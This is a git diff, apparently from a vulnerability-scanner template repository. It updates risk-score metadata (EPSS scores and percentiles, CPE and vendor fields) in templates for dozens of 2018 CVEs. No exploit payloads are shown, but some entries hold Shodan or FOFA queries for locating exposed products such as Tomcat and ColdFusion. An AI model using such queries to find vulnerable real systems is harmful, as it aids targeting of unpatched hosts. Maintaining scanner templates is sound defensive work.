cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:* + epss-percentile: 0.99916 metadata: max-request: 2 shodan-query: title:"Apache Tomcat" diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 7e630fd38e..8c661eb508 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.1 cve-id: CVE-2018-11776 cwe-id: CWE-20 - epss-score: 0.97562 + epss-score: 0.97557 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* + epss-percentile: 0.99995 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index ee42904d71..af52b2ed44 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -17,8 +17,9 @@ info: cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 - epss-score: 0.9667 + epss-score: 0.96524 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* + epss-percentile: 0.99413 metadata: max-request: 1 shodan-query: title:"Apache Tomcat" diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index b287150ce1..27d6fd7b53 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01411 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* + epss-percentile: 0.84811 metadata: max-request: 2 vendor: eaton diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 17efc68af9..1c99b61b97 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 - epss-score: 0.55866 + epss-score: 0.43824 cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* + epss-percentile: 0.96879 metadata: max-request: 1 vendor: schools_alert_management_script_project diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 5caa81ff85..98f218b5df 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -19,8 +19,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1207 cwe-id: CWE-94 - epss-score: 0.03417 + epss-score: 0.01778 cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* + epss-percentile: 0.86487 metadata: max-request: 1 vendor: dell diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index b843f7ef82..627c331bad 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00407 cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* + epss-percentile: 0.70495 metadata: max-request: 1 vendor: oecms_project diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 1b513a24fa..1636f9a33f 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -13,8 +13,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12296 cwe-id: CWE-732 - epss-score: 0.01284 + epss-score: 0.01503 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* + epss-percentile: 0.85298 metadata: max-request: 1 vendor: seagate diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 124fa33703..92f7e22058 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-601 epss-score: 0.00118 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* + epss-percentile: 0.45103 metadata: max-request: 1 vendor: seagate diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index a9ea137c63..f27ae5be55 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 - epss-score: 0.97501 + epss-score: 0.97383 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* + epss-percentile: 0.99864 metadata: max-request: 1 vendor: phpmyadmin diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 5515f21043..794f558ad9 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 - epss-score: 0.96198 + epss-score: 0.95864 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* + epss-percentile: 0.99211 metadata: max-request: 1 vendor: circontrol diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 1cfa7afed7..769964b0ef 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.00118 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* + epss-percentile: 0.45103 metadata: max-request: 1 verified: true diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 9618696e9a..eb3fd429bb 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - epss-score: 0.00986 + epss-score: 0.00803 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* + epss-percentile: 0.79507 metadata: max-request: 2 vendor: vmware diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index c2f4110752..cf16f3780f 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -20,9 +20,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1273 - cwe-id: CWE-20,CWE-94 + cwe-id: CWE-94,CWE-20 epss-score: 0.97498 cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* + epss-percentile: 0.9996 metadata: max-request: 2 vendor: pivotal_software diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 69c672ddcf..bbc8c61928 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -11,14 +11,19 @@ info: - https://github.com/jokkedk/webgrind/issues/112 - https://nvd.nist.gov/vuln/detail/CVE-2018-12909 classification: - cve-id: CVE-2018-12909 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 + cve-id: CVE-2018-12909 cwe-id: CWE-22 + epss-score: 0.01119 + cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* + epss-percentile: 0.82786 metadata: max-request: 1 verified: true fofa-query: app="Webgrind" + vendor: webgrind_project + product: webgrind tags: cve,cve2018,lfi,webgrind http: diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 5060ae2c55..8f2258a9d4 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12998 cwe-id: CWE-79 - epss-score: 0.97111 + epss-score: 0.97052 cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* + epss-percentile: 0.99648 metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 3dfaa27691..31b58ef8eb 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 - epss-score: 0.97341 + epss-score: 0.97218 cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* + epss-percentile: 0.99743 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 2c04a2b4a0..37557205a0 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-13379 cwe-id: CWE-22 - epss-score: 0.97492 + epss-score: 0.97486 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* + epss-percentile: 0.99951 metadata: max-request: 1 verified: true diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index b794df3558..219b1eb3e2 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00122 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* + epss-percentile: 0.45743 metadata: max-request: 2 vendor: fortinet diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 387d6a8bf6..261d2ad26d 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.0018 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* + epss-percentile: 0.5447 metadata: max-request: 1 vendor: zeta-producer diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 763aef53de..c28957583e 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14013 cwe-id: CWE-79 - epss-score: 0.00533 + epss-score: 0.00512 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* + epss-percentile: 0.73663 metadata: max-request: 1 vendor: synacor diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index 79f4242e5c..8b65835d54 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.28372 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* + epss-percentile: 0.96243 metadata: max-request: 1 vendor: velotismart_project diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 9c971abb46..26f9b3ef3a 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.00068 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* + epss-percentile: 0.28011 metadata: max-request: 2 vendor: goodoldweb diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 929c5828ad..381ffabd92 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14574 cwe-id: CWE-601 - epss-score: 0.00962 + epss-score: 0.01218 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* + epss-percentile: 0.83586 metadata: max-request: 1 vendor: djangoproject diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index 0345e2dd59..b773921bb5 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14728 cwe-id: CWE-918 - epss-score: 0.96872 + epss-score: 0.96926 cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* + epss-percentile: 0.99601 metadata: max-request: 1 vendor: tecrail diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index b953b2716f..8e756dbc09 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - epss-score: 0.97328 + epss-score: 0.97246 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* + epss-percentile: 0.99761 metadata: max-request: 1 vendor: cgit_project diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index ec3e53d1fb..38c34817a5 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-732 epss-score: 0.00483 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.72875 metadata: max-request: 1 vendor: loytec diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 421ee00d8f..aba7875ad8 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.4378 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.96878 metadata: max-request: 1 shodan-query: http.html:"LGATE-902" diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index d9cf3f4c5a..2808fb78ec 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-601 epss-score: 0.00118 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* + epss-percentile: 0.45103 metadata: max-request: 1 vendor: polarisft diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index b4aa70e2de..cf9de2c15d 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 - epss-score: 0.31973 + epss-score: 0.34955 cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* + epss-percentile: 0.96565 metadata: max-request: 2 vendor: ericssonlg diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index ddda32c21c..408ab6690b 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-918 epss-score: 0.01414 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* + epss-percentile: 0.84824 metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index ec4c24bbfd..2264a27770 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - epss-score: 0.9713 + epss-score: 0.97149 cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* + epss-percentile: 0.99695 metadata: max-request: 1 vendor: tecrail diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 06225dbd1d..b39ec0cb38 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 - epss-score: 0.96738 + epss-score: 0.9654 cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99425 metadata: max-request: 1 vendor: argussurveillance diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index dd68e261cf..13eae1f356 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 - epss-score: 0.97474 + epss-score: 0.97453 cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* + epss-percentile: 0.99925 metadata: max-request: 2 shodan-query: http.component:"Adobe ColdFusion" diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index 3bdf2ccf68..bf947f6d07 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16059 cwe-id: CWE-22 - epss-score: 0.64355 + epss-score: 0.60231 cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* + epss-percentile: 0.97328 metadata: max-request: 1 vendor: endress diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 4e63f521f2..8cc1f06d94 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16133 cwe-id: CWE-22 - epss-score: 0.07059 + epss-score: 0.11636 cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* + epss-percentile: 0.94538 metadata: max-request: 1 vendor: cybrotech diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index e21bbe5fb1..593552d8be 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* + epss-percentile: 0.47998 metadata: max-request: 1 shodan-query: title:"Bibliopac" diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index f94ff71fc5..e338ebb0d4 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16159 cwe-id: CWE-89 - epss-score: 0.01316 + epss-score: 0.01247 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.83832 metadata: max-request: 1 verified: true diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 7e81b077af..006537a22d 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-78 epss-score: 0.13203 cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* + epss-percentile: 0.94828 metadata: max-request: 1 vendor: jpcert diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 4cd6f85204..bea41a06ad 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - epss-score: 0.20198 + epss-score: 0.2134 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95789 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 27494001c1..f1ca9f4208 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 - epss-score: 0.1824 + epss-score: 0.2541 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* + epss-percentile: 0.96066 metadata: max-request: 1 vendor: lg diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index c42451709f..39abf3bcdd 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-16299 cwe-id: CWE-22 - epss-score: 0.11104 + epss-score: 0.08709 cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.93696 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml index f621ad2d63..cb895ebc67 100644 --- a/http/cves/2018/CVE-2018-16341.yaml +++ b/http/cves/2018/CVE-2018-16341.yaml @@ -6,13 +6,13 @@ info: severity: high description: | Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection. - classification: - cve-id: CVE-2018-16341 reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-16299 - tags: cve,cve2018,nuxeo,ssti,rce,bypass + classification: + cve-id: CVE-2018-16341 metadata: max-request: 1 + tags: cve,cve2018,nuxeo,ssti,rce,bypass http: - method: GET diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 95b5a0cd96..311fe57c58 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16668 cwe-id: CWE-287 - epss-score: 0.00374 + epss-score: 0.00352 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* + epss-percentile: 0.68356 metadata: max-request: 1 vendor: circontrol diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index e0ed2229df..726a725672 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16670 cwe-id: CWE-287 - epss-score: 0.00199 + epss-score: 0.00187 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* + epss-percentile: 0.55422 metadata: max-request: 1 vendor: circontrol diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 004e7f3e11..7f6d286344 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16671 cwe-id: CWE-200 - epss-score: 0.0038 + epss-score: 0.00357 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* + epss-percentile: 0.68577 metadata: max-request: 1 vendor: "circontrol" diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 8b3b0cc0cc..03009b40be 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -13,8 +13,9 @@ info: cvss-score: 9.1 cve-id: CVE-2018-16716 cwe-id: CWE-22 - epss-score: 0.00581 + epss-score: 0.00803 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* + epss-percentile: 0.7951 metadata: max-request: 1 vendor: nih diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 9da9921dbc..08afc87ccb 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.00068 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* + epss-percentile: 0.28011 metadata: max-request: 2 vendor: eventum_project diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 01478c8d80..8cb73dab0d 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 - epss-score: 0.75214 + epss-score: 0.79948 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.97878 metadata: max-request: 1 vendor: thedaylightstudio diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 0f3c6a6bb1..9b766218b6 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16836 cwe-id: CWE-22 - epss-score: 0.2221 + epss-score: 0.34263 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* + epss-percentile: 0.96533 metadata: max-request: 1 vendor: rubedo_project diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 2b47330554..e14105ec94 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-113 epss-score: 0.00118 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* + epss-percentile: 0.45103 metadata: max-request: 1 verified: true diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index e41720066b..a026665bb4 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-829,CWE-73 epss-score: 0.96913 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* + epss-percentile: 0.99595 metadata: max-request: 1 vendor: elastic diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 13923109fc..e4d56b7cdf 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -14,15 +14,15 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 - epss-score: 0.83749 + epss-score: 0.81793 cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* + epss-percentile: 0.97937 metadata: max-request: 1 framework: joomla\! vendor: arkextensions product: jck_editor tags: cve,cve2018,packetstorm,edb,joomla,sqli - variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 26a3a062a0..579f4b56dd 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00118 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* + epss-percentile: 0.45103 metadata: max-request: 2 verified: true diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 677e087c3c..d2a60224a0 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-287 epss-score: 0.10458 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* + epss-percentile: 0.94254 metadata: max-request: 2 vendor: comodo diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 0e5c1d8340..9bdb4e8caf 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00106 cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* + epss-percentile: 